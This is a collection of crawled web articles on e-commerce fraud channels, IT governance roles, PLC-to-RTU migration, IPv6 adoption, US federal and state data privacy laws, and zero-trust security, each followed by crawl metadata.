Fraud methods vary depending on the sales channel, and the fact that most merchants aim to achieve multi-channel sales does not make the situation any easier. According to 69 percent of the merchants surveyed in (2), sales via third-party websites like Amazon, Alibaba or eBay are particularly susceptible to fraud. These are followed by mobile sales (mentioned by 64 percent) and sales via their own online shops (55 percent). | <urn:uuid:0e104292-413e-43b9-8d76-ac2a8591528e> | CC-MAIN-2022-40 | https://informationsecuritybuzz.com/articles/types-fraud-e-commerce/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.43/warc/CC-MAIN-20220928020513-20220928050513-00554.warc.gz | en | 0.94894 | 1,590 | 2.796875 | 3 |
Establishing strong IT governance is essential for any organization that uses IT. To be successful, the role of IT governance in an organization must be clearly defined. Depending on the organization’s size, this governance might be done by a whole team or just by one individual. Whichever organizational model you choose to implement, the scope of the IT governance roles and responsibilities must cover all aspects of the necessary governance. This article will take a look at the IT governance responsibilities and what are commonly seen IT governance roles.
IT governance responsibilities vs IT management responsibilities
There is often confusion both inside and outside of IT about the differences between governance and management. Management and governance are not the same thing and have different responsibilities. To understand these differences, let us take a look at the responsibilities of each of them.
Henri Fayol defined these responsibilities of management in his 1916 book ‘Administration Industrielle et Generale’:
- to forecast and plan
- to organize
- to command or direct
- to coordinate
- to control (In the sense that a manager must receive feedback about a process in order to make necessary adjustments and must analyze any variance)
Management is primarily concerned with maintaining the daily operations of the business. Within IT, these management responsibilities focus on the day-to-day operation of IT. For example: Planning new software releases, organizing support rotas, and telling a development team what to work on next. Good IT management doesn’t automatically lead to effective IT governance, but it can enable it.
Governance is concerned with using and regulating influence to direct and control the actions and affairs of management and others. The person or group with responsibility for governance is accountable for the performance and conformance of the organization. The IT governance team roles and responsibilities in any organization should include the design, implementation, and ongoing compliance with these five responsibilities of IT governance:
- Determine the objectives for IT. These objectives define the purpose of IT and describe how the purpose will be fulfilled. They should be included in any IT vision or mission statements and implemented using a strategic IT plan.
- Design and implement the IT governance framework. The framework includes the objectives for IT, governance principles, policies, IT governance roles and responsibilities, and processes. The framework must be aligned with the organization’s wider governance responsibilities and support the achievement of the company’s goals and strategic objectives. Frameworks should, wherever possible, attempt to utilize industry standards and best practices such as COBIT. The framework should be regularly reviewed and updated as required.
- Define the ethics of the IT organization. Ethics are based on morals and values. They define the rules or standards that will shape how IT staff at all levels conduct themselves within the organization and what behaviors are expected from them.
- Create the culture of the IT organization. The culture drives how IT staff interact with each other and with those outside IT. IT governance is unlikely to be successful unless this governance responsibility is taken seriously. Cultural change does not just happen; it has to be led and nurtured by those at the top of IT. The willingness of people to be ‘governed’ and to support the IT governance system is at the heart of an effective governance culture.
- Ensure compliance. This is an ongoing governance responsibility. It aims to ensure that IT continually meets any regulatory, statutory, and legal obligations supports the organization’s objectives while working within the defined ethical and cultural framework, and follows the IT governance framework. Compliance also includes checking that the IT governance roles and responsibilities are still relevant.
IT governance roles
To ensure the efficient governance of IT, roles should be defined that include appropriate governance responsibilities. IT management’s task is to achieve the objectives of the organization, working within the defined ethical and cultural framework, complying with the governance ‘rules’, and providing assurance back to the governing body that this is being accomplished.
The IT governance roles and responsibilities should be defined in the governance framework and should include a definition of the levels of authority and responsibility given to each role. There are typically four levels of IT governance roles. Each has a distinct purpose with a specific level of authority for decisions that can be made at that level.
The highest level with IT governance responsibilities is Strategic. This level of governance primarily focuses on the alignment between the IT strategy and the business strategy. This governance role is typically provided by a group of senior executives from across the business, including the CIO. This group sets the vision for where the business is going and how IT is expected to help it get there.
The next level of IT governance roles is the Executive level. This is also typically provided by a group drawn from across the business but at the next level down in the organization. This group is responsible for the prioritization of all IT projects, allocating resources, and ensuring the achievement of the business benefits. The CIO normally chairs this body.
The third layer that contributes to the role of IT governance in an organization has two parts: Program governance and Business process governance. Program governance oversees the delivery of specific IT projects. They deal with escalated project issues, organizational change management, and benefits realization. They are typically formed on an ad-hoc basis for a specific project or group of related projects and are disbanded when the project is closed.
The business process governance role is responsible for how organization-wide processes involving IT are executed and amended.
The lowest level of IT governance roles is the Operations layer. This layer typically sits within the operational IT service management functions, concentrating on the governance of incidents, problems, and approving change requests. An example of an IT governance role in this layer is a Change Advisory Board with responsibility for the governance of changes to IT systems.
The primary objective for all IT governance roles and responsibilities is to ensure that policies and strategies are designed and applied so that IT helps the business to meet its objectives. Irrespective of how specific responsibilities are allocated to roles or how the individual roles are organized, it is important to keep a constant focus on this primary objective. | <urn:uuid:ee1de1fa-6e69-4df1-b554-c0d532160a73> | CC-MAIN-2022-40 | https://itchronicles.com/governance/it-governance-roles-responsibilities/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337244.17/warc/CC-MAIN-20221002021540-20221002051540-00554.warc.gz | en | 0.942847 | 1,244 | 2.5625 | 3 |
A PLC (Programmable Logic Controller) device is a small computer used in Supervisory Control and Data Acquisition (SCADA) systems. They provide data and control access to industrial automated processes.
Think about the brain controlling a finger on a light switch. The brain is the PLC, the finger is the equipment at a facility, and the act of turning on and off a switch is the control of inputs and outputs in industrial process.
PLCs can bring many benefits to your company, however, their many downsides are making network managers migrate to more efficient control solutions.
Let's take a look at these PLCs downsides and a cost-efficient alternative to this device.
The first thing you need to take into consideration when evaluating your decision to replace your PLCs is what kind of pain points that are currently bringing to you. The common issues network operators face are:
PLC systems are highly customizable. This won't be a disadvantage if you (or someone in your staff) have a high level of programming skills, but if you don't know (or don't have the time) how to program this can be a real deal-breaker.
PLCs are mostly suited only to manufacturing environments. This is can be a problem if your network is growing and now you see yourself having to monitor equipment at multiple distant sites.
If you need telecom equipment that you need to monitor and control, you know that their environment is often harsh. PLCs are simply are not designed to give you high reliability to endure extreme conditions.
Of course, there are no guarantees that your particular network will be better off without PLCs.
However, if your PLCs are at the end of their operational life and if you identify yourself with these main issues, maybe it's time to migrate to a more rugged device.
If you think that is time to invest in a more rugged solution for your SCADA system, then it's time for you to take a deeper look at Remote Telemetry/Terminal Units (RTUs).
RTUs are devices designed to be deployed at remote sites to monitor and report events occurring there. They are often used as a cost-effective alternative to PLCs, as they provide the same level of information and automation at remote facilities.
Some of the advantages of implementing RTUs include:
When compared to an PLC, an RTU is more "heavy-duty". They have more monitoring and control capacity than PLCs. So, RTUs are superior to PLCs when it comes to monitor and control many different devices.
They come programmed by the manufacturer, so how well you can program is not a problem here. If you have new employees, training them will be easier and faster. Keep in mind, though, that if you need a custom design to attend specific needs, simply look for a vertical-integrated company that can develop a custom-fit solution for your requirements.
Also, RTUs can control multiple processes, even without the direct intervention of a master station. Some of these processes include the specialization in networking, communications, and transportation processes.
RTUs are more suited to use in wider geographical areas due its wireless communication capabilities.
When choosing the right RTU for your network, it's important to take into consideration your current needs and future goals. When you buy a device that not only supports your present requirements but can expand to accommodate future goals, your investment goes a long way.
Other than this important aspect, there are five essential features to look for when shopping for an RTU:
Many common site problems - from power outages to high-temperature alarms - can be solved by quickly turning on a device such as a generator or an air conditioner. Control relays allow you to remotely operate the equipment at your remote sites, which helps you eliminate expensive truck rolls.
Detailed alarm notifications
Make sure your RTU device is able to give you detailed, informative information about your site situation. If your RTU includes diagnostic information in each alarm, that's even better. This way, you will be able to make informed decisions in a timely manner in case of an emergency.
It's safe to say that all your network tech and operators know how to use a web browser. Having an RTU that features a web browser makes sure that all your tech and operators can access your remote monitoring system from any computer, at any location.
Redundant backup communication
Backup serial ports or even internal modems are a great alternative to keep your monitoring system online even during a LAN failure.
Redundant backup power inputs
Having dual power inputs and battery backup keeps monitoring online even during power failures. Having both redundant backup communication and redundant backup power inputs allows you to visibility over your network no matter what.
You might need to replace PLCs due to age. You also might decide that an RTU with built-in functions is a way to handle the retirement wave that's sweeping through many different industries. As new employees join the company, they'll have a much easier time with an RTU that doesn't require traditional programming. You can have a smaller, less-trained team and still manage your large and growing network.
The goal here is to protect yourself with increasing levels of automation. You and a core team of experts should design the system that's incredibly easy for your newer users to understand and manage.
Don't go blindly forward when you're thinking about replacing PLCs. Talk to experts (and find more than one). Look for a company that can do some of the customizations you would have otherwise programmed yourself - and also include tech support and a user manual to really make sure you have a system your future teams can handle for 10 years or more.
Start your vendor search by contacting us today.
You need to see DPS gear in action. Get a live demo with our engineers.
Have a specific question? Ask our team of expert engineers and get a specific answer!
Sign up for the next DPS Factory Training!
Whether you're new to our equipment or you've used it for years, DPS factory training is the best way to get more from your monitoring.Reserve Your Seat Today | <urn:uuid:d90e224f-c9b1-4137-bdbd-6f19fa0dcc2f> | CC-MAIN-2022-40 | https://www.dpstele.com/rtu/plc/why-you-should-think-about-plc-replacement.php | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00554.warc.gz | en | 0.954196 | 1,284 | 2.859375 | 3 |
Several years ago, I wrote an article explaining how there is plenty of address space with IPv4 and that the IPv6 hype had some merit, but most of it was being used as another push to scare organizations into buying a bunch of equipment they may not need.
It turns out that I was mostly correct.
How do I know this? We are regularly inside customer networks doing upgrades and support. Yes, we do see a smattering of IPv6 traffic in their logs, but it generally does not originate from their users, and at most it is a fraction of a percent. Basically, this means that their old IPv4 equipment probably would still suffice without upgrades had they gone that route.
Back in 2012 the sky was falling, everything needed to be converted over to IPv6 to save the Internet from locking up due to lack of address space. There may be elements of the Internet where that was true but such dire predictions did not pan out in the Enterprise. Why?
Lack of control over their private address space with IPv6.
For example, one of the supposed benefits of IPv6 addressing schemes is that they are assigned to a device in the factory, as there are so many addresses available they are practically infinite. The problem for an IT professional managing a network is that you can’t change that IPv6 address (as far as I know) and that is where the breakdown begins.
In private organizations, the IT department wants to manage bandwidth and security permissions. Although managing security and permissions are possible with IPv6, you lose the orderliness of an IPv4 address space.
For example, there is no easy shorthand notation with IPv6 to do something like:
“Block the address range 192.168.1.100/24 from accessing a data base server”.
With IPv4, the admin typically assigns IP addresses to different groups of people within the enterprise and then they can go back and make a general rule for all those users with one stroke of the pen (keyboard).
With IPv6 the admin has no control over the ip addresses, and would need to look them up, or come up with some other validation scheme to set such permissions.
I suppose the issues stated above could have been overcome by a more modern set of tools, but that did not happen either. Again, I wonder why?
I love answering my own questions. I believe that the reason is that the embedded NAT/PAT addressing schemes that had been used prior to the IPv6 push, were well established and working just fine. Although I am not tasked with administering a large network, I did sleep at a Holiday Inn (once), and enterprise admins do not want public IP’s on the private side of their firewall for security purposes. Private IP addresses to the end in itself is likely more of security headache than the Ip4 NAT/PAT address schemes.
The devil’s advocate in me says that the flat address space across the world of an IPv6 scheme is elegant and simple on face value, not to mention infinite in terms of addresses. IPv6 promises 2,250,000,000 Ip addresses, for every living person on earth. It just was not compelling enough to supplant the embedded IPv4 solutions with their NAT/PAT addressing schemes. | <urn:uuid:d1ae63d8-4020-454a-a463-b63293b06e2c> | CC-MAIN-2022-40 | https://netequalizernews.com/category/uncategorized/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337524.47/warc/CC-MAIN-20221004184523-20221004214523-00554.warc.gz | en | 0.970491 | 673 | 2.515625 | 3 |
In the digital age, data privacy protection and regulation have become more critical than ever
It is now a matter of priority for most individuals, organizations, and governments across the globe. As a result, virtually every free country globally, including the United States, has introduced some form of data protection regulation or other to regulate how personal information is collected, stored, and shared. What control a data subject has over their personal information.
Although in the U.S, for example, there is no central all-encompassing federal data privacy law like the EU GDPR. However, several vertically-focused federal data privacy laws are targeting one sector of the economy or another, as well as a new generation of consumer-oriented privacy laws coming from the states. The U.S Federal Trade Commission (FTC) is the agency vested with the power to enforce those regulations at the federal level, while state attorneys do the same at the state level.
This article will take a detailed look at the various federal and state data privacy laws in the United States. Hopefully, this will help you fully comprehend the provisions of those laws and prepare your business for compliance.
Federal Data Privacy Laws
The Privacy Act is a United States federal law enacted on December 31, 1974, to govern the collection, use, and dissemination of PII about individuals held by federal agencies.
It was created in response to concerns about how the creation and use of computerized databases might impact individuals’ privacy rights.
The Act only covers U.S. citizens and permanent residents. Thus, only a citizen or permanent resident can sue under the Privacy Act. In addition, the Act applies only to certain federal government agencies.
Privacy Act obligation: The privacy Act protects citizen’s privacy through the following rules and rights in the handling of personal data:
- Citizens have a right to access any data held by government agencies; and a right to copy and correct any information errors
- Government agencies must follow data minimization principles (relevant and necessary information to accomplish its purposes) or “fair information practices” when gathering and handling personal data
- Sharing of information between other federal (and non-federal) agencies is restricted and only allowed under certain conditions
- Individuals have a right to sue the government for violating its provisions
However, there are specific exceptions to the Act that allow personal information under certain conditions. These exceptions mean that individual privacy is not entirely guaranteed as the Act’s drafters might have wished. Furthermore, the Privacy Act only applies to records held by an “agency.” Therefore, the records maintained by courts, executive components, or non-agency government entities are not subject to the provisions in the Privacy Act, and there is no right to these records.
Penalties for violating the Privacy Act: The Privacy Act provides civil and criminal penalties for violating the Act’s provisions. The following are some of the applicable penalties for non-compliance:
- If an agency refuses to amend an individual’s record upon request, the individual can sue in civil court to have the record amended. The court can also award the individual reasonable attorney’s fees and other litigation costs to be paid by the agency
- If any government agency employee willfully discloses PII, they will be fined a maximum of $5,000
- If any agency employee willfully maintains a records system without disclosing its existence and relevant details as specified above, they can be fined a maximum of $5,000
- Anyone who willfully requests an individual’s record from an agency under false pretenses can be fined a maximum of $5,000
The Health Insurance Portability and Accountability (HIPAA) Act
HIPAA is a federal statute that was signed into law on August 21, 1996. It was created primarily to modernize the flow of healthcare information and stipulate how the confidentiality and integrity of personally identifiable information (PII) held by healthcare providers should be protected.
HIPAA is crucial because it ensures healthcare providers and related organizations implement adequate safeguards to protect sensitive personal health information.
HIPAA obligations: Healthcare providers are obligated to provide safeguards to protect the confidentiality, integrity, and availability of private health information (PHI). The following rules define the structure of everything related to HIPAA compliance requirements:
- The Privacy Rule—This regulates the use and disclosure of PHI held by covered entities
- The Security Rule—This outlines security controls that are organized into administrative (security policies and procedures, user training, and HR), physical (covers all aspects of physical security safeguards), and technical (covers all aspects of cybersecurity) precautions
- The Breach Notification Rule requires covered entities to notify patients, HHS, and other key stakeholders when their unsecured PHI is impermissibly breached
- The Omnibus Rule—The implication of this rule is that covered entities are responsible for any potential violations of business associates and contractors and need to take appropriate actions accordingly
Patient’s rights: Patients have several rights under the HIPAA privacy rule, including access to their health records and the right to request corrections.
The right of access provides individuals with a legal, enforceable right to access and receive copies, upon request, of the information in their health records held by their healthcare providers. A patient also has the right to amend PHI for as long as the PHI is in a designated record set.
Penalties for violating HIPAA: All healthcare-related entities that collect, store, or share patient health information are expected to be in complete compliance with HIPAA. Non-compliance to the provisions of the law attracts stiff penalties. The most common type of violation stems from non-compliance with HIPAA privacy, security, or breach notification rules.
The penalties for non-compliance are based on the level of negligence. They can range from $100 to $50,000 per violation, with a maximum fine of $1.5 million per year for violations of an identical provision. Violations can also carry criminal charges that can result in jail terms. Here is a list of HIPAA notable violations and fines from 2015-2021 and a list of those currently under investigation.
Gramm–Leach–Bliley Act (GLBA)
GLBA is a federal statute that was signed into law on November 12, 1999. The law requires financial institutions and other businesses that offer financial services and products to communicate to their customers how they protect and share their private information and the customer’s right to opt-out of any third-party data sharing.
GLBA compliance makes it mandatory for all financial institutions to have the policy to protect the confidentiality and integrity of customers’ information from any foreseeable threats.
GLBA obligations: Financial services providers are obligated to provide safeguards to protect the confidentiality, integrity, and availability of customer’s personal information by adhering to the following rules:
- Financial Privacy Rule This requires financial institutions to provide each consumer with a privacy notice once a consumer relationship is established and annually after that. The privacy notice must explain the information collected about the consumer, including where and how the information is used, shared, and protected, and their rights to opt-out of third-party information sharing
- Safeguards Rule The Safeguards require financial institutions to develop a written information security policy that describes how the company is prepared for and plans to continue to protect clients’ nonpublic personal information
- Pretexting Protection GLBA prohibits the practice of pretexting—a form of social engineering attack that occurs when someone tries to access personal, non-public information without the proper authority to do so. Organizations covered by GLBA are required to implement safeguards against pretexting attacks
Penalties for violating GLBA: Failure to comply with GLBA attracts severe penalties for the financial institution and its employees.
- A financial institution can be fined up to $100,000 for each violation and an amount that goes up to one percent of the company’s assets
- Employees can also be fined up to $10,000 individually for each violation
- If they don’t follow the safety policies and procedures in place, they may get a $1,000,000 fine and between 5-12 years of prison term
Children’s Online Privacy Protection Act (COPPA)
COPPA is a United States federal law enacted on April 21, 2000, to regulate the online collection of personal information about children under 13 years of age.
The law protects children’s privacy by requesting parental consent to collect or use any personal information of children. It was created to increase parental involvement in children’s online activities in response to a growing awareness of Internet marketing techniques that targeted children and collected their personal information from websites without parental notification.
The Act applies to commercial websites and online services (including mobile apps) that are directed at children, as well as foreign websites that are directed at U.S children. It doesn’t apply to general audience websites unless they have specific services that attract children to their site.
COPPA obligations: Websites or mobile apps directed to children are obligated to adhere to fair information practices in the collection and use of personal information. The National Law Review has a detailed breakdown of the steps you need to take to comply with COPPA obligations:
- Make reasonable efforts (taking into account available technology) to provide direct notice to parents of the operator’s practices concerning the collection, use, or disclosure of PI from children under 13, including notification of any material change to such methods to which the parents have previously consented;
- Obtain verifiable parental consent, with limited exceptions, before any collection, use, and disclosure of PI from children under 13;
- Provide a reasonable means for a parent to review the PI collected from their child and to refuse to permit its further use or maintenance;
- Establish and maintain reasonable procedures to protect the confidentiality, security, and integrity of the PI collected from children under 13, including by taking reasonable steps to disclose/release such PI only to parties capable of maintaining its confidentiality and security; and
- Retain PI collected online from a child for only as long as is necessary to fulfill the purpose for which it was collected and delete the information using reasonable measures to protect against its unauthorized access or use.
- Operators are prohibited from conditioning a child’s participation in an online activity on the child providing more information than is reasonably necessary to participate in that activity
Penalties for violating COPPA: The FTC has the authority to enforce COPPA compliance. According to the FTC, courts may fine violators of COPPA up to $42,530 in civil penalties for each violation. The amount of civil penalties a court assesses is dependent on several factors such as the enormity of the offenses, previous record of violation, the number of children involved, the amount and type of PI collected and how it was used, the size of the company.
The FTC has brought several actions against some online services companies for failing to comply with COPPA requirements, including actions against Google, TikTok, Lisa Frank, American Pop Corn Company, and others. Google has in recent times shifted responsibility for COPPA compliance onto YouTube kid’s content creators. This means that videos targeted at kids under 13 years can no longer carry behaviorally targeted ads.
Fair and Accurate Credit Transactions Act (FACTA)
FACTA is a federal statute signed into law on December 4, 2003, as an amendment to the Fair Credit Reporting Act.
It was primarily designed to cut down on the number of identity theft incidents and improve secure disposal or destruction of consumer information. The law also allows consumers to request and obtain a free credit report once every 12 months from each of the three consumer credit reporting companies in the U.S—Equifax, Experian, and TransUnion.
FACTA obligations: FACTA provides rules for financial service providers, lenders, credit reporting agencies, and all businesses with “covered accounts” to detect and protect consumers from fraud and identity theft. A “covered account” includes any account for which there is a foreseeable risk of identity theft.
One of such rules is the Red Flags Rule—which requires companies to put in place identity theft policies and procedures that would assess identity theft risk factors, test and implement those policies to detect and address identified risks, and train employees to ensure that those policies and procedures are correctly adhered to.
In addition to the Red Flags Rule, FACTA establishes rules concerning Fraud Alerts and Active Duty Alerts. Upon the request of a consumer (who believes they are about to be a victim of fraud or identity theft), the law requires consumer reporting agencies to place a fraud alert on their file so that no new credit line is opened in their name without explicit confirmation from you. An active duty alert requires the reporting agency to disclose such an alert with any credit report issued within 12 months of the request.
Penalties for violating FACTA: Both federal and state penalties may apply to FACTA violations:
- Federal government FACTA penalties can be up to $2,500 per violation
- State FACTA penalties can be up to $1,000 per violation
- Businesses that fail to truncate debit/credit card numbers during the printout of transaction receipts may be subject to the payment of statutory damages ranging from $100 to $1000 per violation
- Class action lawsuits can be up to $1,000 for each consumer affected
State Data Privacy Laws
California Consumer Privacy Act (CCPA)
CCPA is a state statute for residents of the state of California in the United States that came into force on January 1, 2020.
The CCPA is designed to give Californians control over their data. It is adjudged as the US’s most comprehensive data privacy legislation, similar to the E.U GDPR. The law applies to businesses in California that collect consumers’ data and can be described in any or all of the following ways:
- Derives 50% or more of its annual revenues from selling consumers’ personal information
- Buys or sells the personal information of 50,000 or more consumers, households, or devices
- Has annual gross revenues above $25,000,000
CCPA consumer rights: The CCPA regulation empowers users with new data rights. To comply with the regulation, your organization must enable users to exercise their CCPA rights. For example, if you are a resident of California, you now have the right to:
- Sue a business if it fails to implement reasonable security measures and your data is compromised in a data breach
- Know what personal data is being collected about you, and to be able to access it
- Know whether your data is sold or disclosed and to whom
- Not be discriminated against for exercising their privacy rights
- Ask a business to delete your data
- Opt-out of the sale of your data
Penalties for violating CCPA: Companies have 30 days to comply with the law once regulators notify them of a violation. If they fail to resolve the issue within the giving period, there’s a fine of up to $7,500 per record. Other applicable penalties include:
- Payment of statutory damages between $100 to $750 per California resident and incident, or actual damages, whichever is greater, if the personal data of users is compromised in a data breach
- A fine of upto $7,500 for each intentional violation and $2,500 for each unintentional violation
- Liability may also apply in respect of businesses in overseas countries that ship items into California
Virginia Consumer Data Protection Act (CDPA)
CDPA is a state statute for residents of the state of Virginia in the United States.
Like the California Consumer Privacy Act (CCPA), the CDPA is designed to give Virginia consumers more control over their data. This makes Virginia become only the second state to enact comprehensive privacy legislation.
Although the law takes effect on January 1, 2023, businesses are expected to begin evaluating their obligations to ensure they have sufficient time to comply. A company is subject to the CDPA if they either conduct business in Virginia or produce products or services that are targeted to Virginia residents and meet one of the following requirements:
- During a calendar year, control or process personal data of at least 100,000 consumers; or
- Control or process personal data of at least 25,000 consumers and derive over 50 percent of gross revenue from the sale of personal data
CDPA obligations: The CDPA places several obligations for businesses processing personal data. These obligations include:
- Limits on Collection and Use of Data: Businesses are required to limit the collection of personal data to “what is adequate, relevant, and reasonably necessary” for the purpose for which the data is processed
- Consent for Processing Sensitive Data: Businesses are required to obtain the consumer’s permission before processing any sensitive data
- Reasonable Security Controls: Businesses are required to implement and maintain good administrative, technical and physical data security practices to protect the confidentiality, integrity, and accessibility of personal data
- Data Protection Assessments: Businesses are required to conduct data protection assessments (DPAs) to evaluate the risks associated with particular data processing activities
Consumer Privacy Rights: The CDPA enumerates the following privacy rights for Virginia consumers:
- Right to Access
- Right to Rectification
- Right to Deletion
- Right to Data Portability
- Right to Object to Data Processing
- Right to be Free from Discrimination
Penalties for violating CDPA: Companies have 30 days to comply with the law once regulators notify them of a violation. If they fail to resolve the issue within the giving period, there’s a fine of up to $7,500 per violation.
Other State Laws
Many other upcoming state data privacy laws are currently undergoing legislative scrutiny and passage into law or awaiting executive sign-off. The table below summarizes the various upcoming and existing state data privacy laws.
|State||Name||Businesses covered||Right to Delete?||Right to Access?||Right to Rectification?||Status|
|California||California Consumer Privacy Ac||Revenues over $25 million||Yes||Yes||No||In effect since January 1, 2020|
|Virginia||Virginia Consumer Data Protection Act||All||Yes||Yes||Yes||Takes effect on January 1, 2023|
|New York||New York Privacy Act||All||Yes||Yes||Yes||Pending|
|Massachusetts||Massachusetts Data Privacy Law||Over $10 million||Yes||Yes||No||Pending|
|Maryland||Maryland Online Consumer Protection Act||Over $25 million||Yes||Yes||No||Pending|
|Hawaii||Hawaii Consumer Privacy Protection Act||All||Yes||Yes||No||Pending|
Table 1.0 Comparison of current and upcoming state data protection laws | <urn:uuid:ade8fb5c-119f-4a52-bb49-dcd721d9769d> | CC-MAIN-2022-40 | https://www.comparitech.com/data-privacy-management/federal-state-data-privacy-laws/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337524.47/warc/CC-MAIN-20221004184523-20221004214523-00554.warc.gz | en | 0.934699 | 3,937 | 3.5 | 4 |
alphaspirit - Fotolia
In the past, IT security was focused on protecting the corporate network by securing the perimeter. If the perimeter is secure, then only legitimate users, such as employees, have access to the services and applications available within it.
After all, these people were vetted when they joined the organisation; they are responsible individuals and would never deliberately reveal their passwords, access data that is supposed to be off limits or steal company secrets. But the hyper-connected world of today means trust can no longer be taken for granted.
According to Tim Holmes, CEO at 2-sec security consultancy, zero trust sums up what should and should not be done when securing IT. “Entrusting that all your users, bring-your-own devices and systems on the network won’t hack you is a mantra that is still being played back to me today by companies that should know better, with more than enough budget, resource and common sense to sort this all out,” he says.
Holmes recommends that IT security professionals consider zero trust as a means to achieve security that is designed to be infallible. According to Holmes, the whole point of a penetration test is to gain unauthorised access to systems, so part of the test will usually involve spoofing a system and/or pretending to be someone else. This tests what is exposed when there is authorised access. “If I can be that system or that person, then I’m trusted to do what that system or person is expected to do,” says Holmes.
Networks should be built on the principle that all machines are publicly exposed on the internet, he says. “You’ll soon get the idea of what needs doing. Intra-system communication should be encrypted, just as your connection to [Microsoft] Office 365 or other cloud services is encrypted. That would stop me dead in my tracks, as network sniffing would just spew out garbage,” adds Holmes.
While a hacker or penetration tester may still try to spoof people, applications and systems, if multifactor authentication (MFA) is enabled on internal systems, then, he says, there is no chance of such attacks happening unless the MFA key fobs or public key infrastructure (PKI) are somehow compromised.
Zero trust requires strict verification of all systems and people interacting with the ecosystem. One of the pillars of this approach is the concept of “least privilege”. Cyber security industry veteran Eoin Keary says this implies that IT security is implemented so that it only provides access to the system needed.
“The result of this approach is segmentation of the network and systems within the perimeter – also called micro-segmentation – whereby the network is broken into zones, each of which requires authorisation to access and utilise,” he says. “It is fundamentally a ‘trust but verify’ approach to security.”
Among the technologies IT buyers are likely to come across as they start to assess zero trust is privileged access management (PAM). Keary says this refers to a class of products that help secure, control, manage and monitor privileged access to critical assets, which is a core component to the zero-trust model. But he warns: “Least privilege is only the starting point of zero trust. Many systems and architectures have not taken into account least privilege or PAM, and to retrofit such a model would be a significant project.”
Read more about zero trust
- No trust in zero trust need not be a problem.
- Eoin Kary looks at facing the challenge of zero trust.
- Petra Wenham explores practical steps to achieve zero trust.
- Mike Gillespie discusses why zero trust is not the answer to all your problems.
- Tim Holmes looks at why zero trust should be considered just another name for security basics.
- Simon Persin looks at whether zero trust is the right option for your business.
This has led to a slower take-up of zero trust by firms trying to build it into existing IT infrastructure. Keary says organisations have most success when they start with a clean sheet on a greenfield site.
Jason Revill, who leads the security practice for UK and Ireland at Avanade, says: “With all of my UK clients, I don’t see anyone raising zero trust as a priority.” In Revill’s experience, many organisations have flat networks that are complex to segment.
Historically, IT infrastructure was built up from the deployment of peer-to-peer (P2P) and distributed systems. Basically, these are not architected to fulfil the micro-segmentation requirements of zero trust. P2P models include the Windows operating systems and wireless mesh networks. “P2P breaks the zero-trust model as systems communicate in a decentralised manner, which breaks the micro-segmentation model,” says Keary. Peer-to-peer systems also share data with little or no verification, which means they break the least privilege model. “If your architecture or processes support shared access accounts, implementing zero trust would be difficult,” warns Keary.
Such legacy infrastructure leads to technical debt and, as Revill points out: “The business case to change to a zero-trust model is very expensive.” Rather than re-engineering the legacy infrastructure to provide zero trust, Revill urges IT decision-makers to consider deploying applications in the cloud to improve security. “By being in the cloud, the network is segmented,” he says.
Revill says single sign-on using Azure Active Directory can then be used to control access to these cloud applications. Although there has not been much customer demand for zero trust, Revill says: “Customers who move to Azure Active Directory for single sign-on achieve zero trust. They are able to control access to resources on trusted and managed devices.”
Clearly, this is easy if firms use SaaS applications from Microsoft or applications that integrate well with Azure Active Directory. For example, Avanade’s own staff use cloud applications such as PowerBI and Office 365, which are integrated via Azure Active Directory. But, says Revill, it is far harder to re-engineer an application that uses lightweight directory access protocol (LDAP).
In an article on the Microsoft website describing the company’s zero-trust journey, it says it started by implementing two-factor authentication (2FA) via smartcards for all users to access the corporate network remotely. This evolved to phone-based 2FA and later, the Azure Authenticator 2FA app. In the article, Microsoft states its ambition to deploy biometrics for user authentication: “As we move forward, the largest and most strategic effort presently under way is eliminating passwords in favour of biometric authentication through services like Windows Hello for Business.”
The next phase of Microsoft’s own deployment involved device enrolment. “We started by requiring that devices be managed (enrolled in device management via cloud management or classic on-premise management),” it explains. “Next, we required devices to be healthy in order to access major productivity applications such as Exchange, SharePoint and Teams.”
Like many organisations, Microsoft’s transition to zero trust is very much a multi-step journey. It says it is working to make primary services and applications that users require reachable from the internet. This means there will need to be a transition from legacy corporate network access to internet-first access where virtual private networks (VPNs) will be used where needed. Finally, it wants to reduce its reliance on VPNs, which it says will reduce users accessing the corporate network for most scenarios.
Recognising there will be instances of contractors, suppliers or guest users requiring access from unmanaged devices, Microsoft plans to establish a set of managed virtualised services that make applications or a full Windows desktop environment available.
Last year, the Google security blog provided an update to the company’s five-year roll-out of BeyondCorp, its zero-trust security model. In the update, Google programme manager Lior Tishbi, product manager Puneet Goel and engineering manager Justin McWilliams write: “Our mission was to have every Google employee work successfully from untrusted networks on a variety of devices without using a client-side VPN.”
The trio outlined three core principles that make up BeyondCorp. First, the network does not determine which services a user has access to. Second, access to services is granted based on what the infrastructure knows about the user and their device. And third, in BeyondCorp, all access to services must be authenticated, authorised and encrypted for every request.
Five years on, and the blog post recognises the importance of executive buy-in when implementing any zero trust. In the blog post, Tishbi, Goel and McWilliams also stress the importance of accurate data. “Access decisions depend on the quality of your input data,” they write. “More specifically, it depends on trust analysis, which requires a combination of employee and device data. If this data is unreliable, the result will be incorrect access decisions, suboptimal user experiences and, in the worst case, an increase in system vulnerability, so the stakes are definitely high.”
Making zero trust integrate seamlessly into the way users work is something the experts Computer Weekly spoke to believe is vital to success. One approach to improving the zero-trust user experience is conditional access, which Avanade’s Revill says can offer a way to make security visible only when it is needed.
But a centrally managed zero-trust framework goes against some of the flexibility and agility that firms are striving to achieve through digital transformation, according to Keary. “Implementing zero trust in a DevOps environment needs additional technology and impact processes to segment and enforce this paradigm given that such an environment is very dynamic,” he says. “Applying zero trust in a DevOps environment without some form of automation and removing the manual aspect would simply not be scalable and would slow down pipeline throughput dramatically.” | <urn:uuid:ee9a351e-20c2-41a1-a733-4fbf7f377343> | CC-MAIN-2022-40 | https://www.computerweekly.com/feature/Trusty-methods-to-keep-out-intruders | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337524.47/warc/CC-MAIN-20221004184523-20221004214523-00554.warc.gz | en | 0.941193 | 2,122 | 2.546875 | 3 |
San Jose-based BC Networks provides managed IT services and Microsoft support in the San Francisco Bay Area. Contact us today for more information on how we can transform your business and make your employees more productive.
